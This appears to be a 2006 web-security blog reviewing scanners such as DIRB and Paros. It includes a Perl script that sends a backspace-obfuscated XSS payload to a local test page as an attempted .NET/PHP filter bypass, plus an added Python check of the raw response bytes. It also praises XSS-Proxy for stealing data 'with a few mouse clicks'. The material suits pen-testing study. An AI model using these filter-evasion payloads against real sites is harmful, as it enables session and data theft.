Monday, July 24, 2006

DIRB

I tried out this URL bruteforcer. The database it has looks impressive. It includes entries categorised in different text files, although the test extension file looks unnecessary: it has all combinations of 3 letters (e.g. aaa, aab, ... aba ... zzz) appended to "test.".

Home page

Description as on sourceforge:
"DIRB - URL Bruteforcer: DIRB is a Web Content Scanner. It looks for hidden Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response. DIRB main purpose is to help in web application auditing."

Wednesday, July 19, 2006

PAROS

Paros is a well-known tool used for testing web-application-related issues. It includes a spider that walks your application. There is a set of tests you can run which cover commonly found vulnerabilities - XSS, SQL injection.

If you want to attack an application manually, you have a trap option which lets you modify the request that is sent out.

I'm not sure if the spider is intelligent enough to understand JavaScript links. But you can use other spidering tools from your browser and then scan all URLs with Paros.

The scan reports generated look very good. They show the vulnerable parameter, the injection string used, remediation steps, etc.

Springenwerk Security Scanner


This is a free XSS scanner available on the web. With a few enhancements, this could make a quick scan of your applications possible. This type of scanner is useful for manual pen-testers when they have to try out loads of injection variations. Such a task is tedious to do manually on each field in the application. This tool generates a report in a nice format.

The following are the features listed on the tool's home page.
  • Finds the most common XSS vulnerabilities
  • Extracts forms and input elements from given webpages and checks them for vulnerabilities
  • Follows the form action targets (1 level)
  • Can check custom HTTP GET and POST data arguments
  • Can use Springenwerk, Firefox or IE in the requests' user agent string
  • Optionally generates an HTML report file with exploits to demonstrate the vulnerabilities
  • Comes with an easy to use GUI
  • Platform independent, written in Python
  • No installation and no super user privileges necessary
  • FREE!

Monday, July 17, 2006

Blogspot XSS
I have accidentally found an XSS vulnerability on blogspot. But later I found that someone has already reported it here. So there is no need to notify blogspot guys again.

Sunday, July 16, 2006

Did I find an XSS vulnerability in .NET and PHP?

This funny incident happened this week. I was too excited after I
found a vulnerability in the .NET security class. Yes, I wondered how
I could find it so easily. I patted myself on the back for this amazing finding. I
thought I was gonna shock the entire world.
Then I went on to trying the same method out on Apache-PHP. And voila! it worked too.



I know you are curious to know what the vulnerability was. But hold
back. I'll describe the experiment I conducted and then you decide
whether you are still curious!


I had built an ASP page which I used for testing purposes.
As usual I tried exploiting it with simple strings. Let's say the page
URL was http://localhost/page.aspx?param=abc. This page just echoed
back the value of param.


I tried URLs like http://localhost/page.aspx?param=<script>
I observed that .NET threw an exception when I injected anything that looked like a tag.


Then my intelligence (I thought I was very intelligent and too smart)
started playing its role. "Why not send illegal characters?" I thought.
"Let me start with a backspace." Really, according to me it was a
brilliant idea!

I decided to use a Perl script to fire a malicious request, which gave rise to the following script:

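use IO::Socket::INET;

# Target host and port (assumed values for the local test server)
$serv = "localhost";
$port = 80;

# Payload: a backspace character (0x08) placed between "<" and "script"
$attack = "<\x08script>alert(123)</script>";

$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $serv,
    Timeout => 10, PeerPort => $port)
    or die "[+] Connecting ... Could not connect to host.\n\n";

# Build the raw request by hand; the payload goes out without URL encoding
$req = "";
$req = $req . "GET http://localhost/page.aspx?param=$attack HTTP/1.0\r\n";
$req = $req . "Host: ".$serv."\r\n";
$req = $req . "Content-type: application/x-www-form-urlencoded\r\n";
$req = $req . "Content-length: 0\r\n";
$req = $req . "Connection: Close\r\n\r\n";

print $sock $req;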


And I used the following code to read the response:

# Print the response line by line, exactly as received
while ($answer = <$sock>)
{
    print $answer;
}


I ran the script, and got the following in the output:
<script>alert(123)</script>

It meant that the applications relying on .NET security were threatened if
this input went into a database and got reflected back (Stored XSS).

The same script was run against PHP/Apache. Results were the same! Great, isn't it?

That was conclusive enough to say that the .NET security check could be bypassed.

Think about it. Was this an indication of a vulnerability? Was this evidence enough to conclude that there was a vulnerability?


Answer: I've saved the answer as a draft. I'll publish it later. Any guesses?
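
A check worth running before drawing a conclusion from printed output like the above (an added example, not part of the original post): printing a response straight to a terminal does not show control characters such as the backspace (0x08), so the sketch below escapes them and tests the raw bytes for a real script start tag. The sample body is constructed and assumes the page echoes the parameter byte-for-byte; the function names are made up for this example.

```python
import re

# Constructed sample (not captured traffic): the body a page would return if
# it echoed the post's `param` value byte-for-byte, backspace (0x08) included.
SAMPLE_BODY = b"<html><body><\x08script>alert(123)</script></body></html>"

# A script start tag needs "<" immediately followed by the tag name.
SCRIPT_OPEN = re.compile(rb"<script[\s/>]", re.IGNORECASE)


def visible(data: bytes) -> str:
    """Render bytes with control and non-ASCII bytes escaped as \\xNN."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in data)


def control_bytes(data: bytes) -> list:
    """Offsets and values of control bytes other than TAB, LF and CR."""
    return [(i, b) for i, b in enumerate(data)
            if (b < 0x20 and b not in (0x09, 0x0A, 0x0D)) or b == 0x7F]


def strip_controls(data: bytes) -> bytes:
    """What a viewer that silently drops control bytes would display."""
    drop = {b for _, b in control_bytes(data)}
    return bytes(b for b in data if b not in drop)


def has_script_tag(data: bytes) -> bool:
    """True only if the raw bytes contain a literal script start tag."""
    return SCRIPT_OPEN.search(data) is not None


def triage(data: bytes) -> dict:
    """Compare what is on the wire with what a lossy display suggests."""
    return {
        "raw": visible(data),
        "control_bytes": control_bytes(data),
        "tag_in_raw_bytes": has_script_tag(data),
        "tag_in_lossy_view": has_script_tag(strip_controls(data)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BODY).items():
        print(f"{key}: {value}")
```

A finding should be judged on `tag_in_raw_bytes`; when it differs from `tag_in_lossy_view`, the display has hidden bytes that change how the markup is parsed.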

Tuesday, July 04, 2006

Amazing XSS exploit tool

http://xss-proxy.sourceforge.net/

Many people think that XSS (cross site scripting) is not very dangerous. This tool explains why and how XSS can be used in order to retrieve sensitive information without knowing much about the web technologies. Anyone who just knows what XSS is, how to run a Perl script (you just need to know how to run it, you need not know Perl!) and the vulnerable site's user he/she wants to attack can do it with a few mouse clicks!

Great work done by Anton Rager.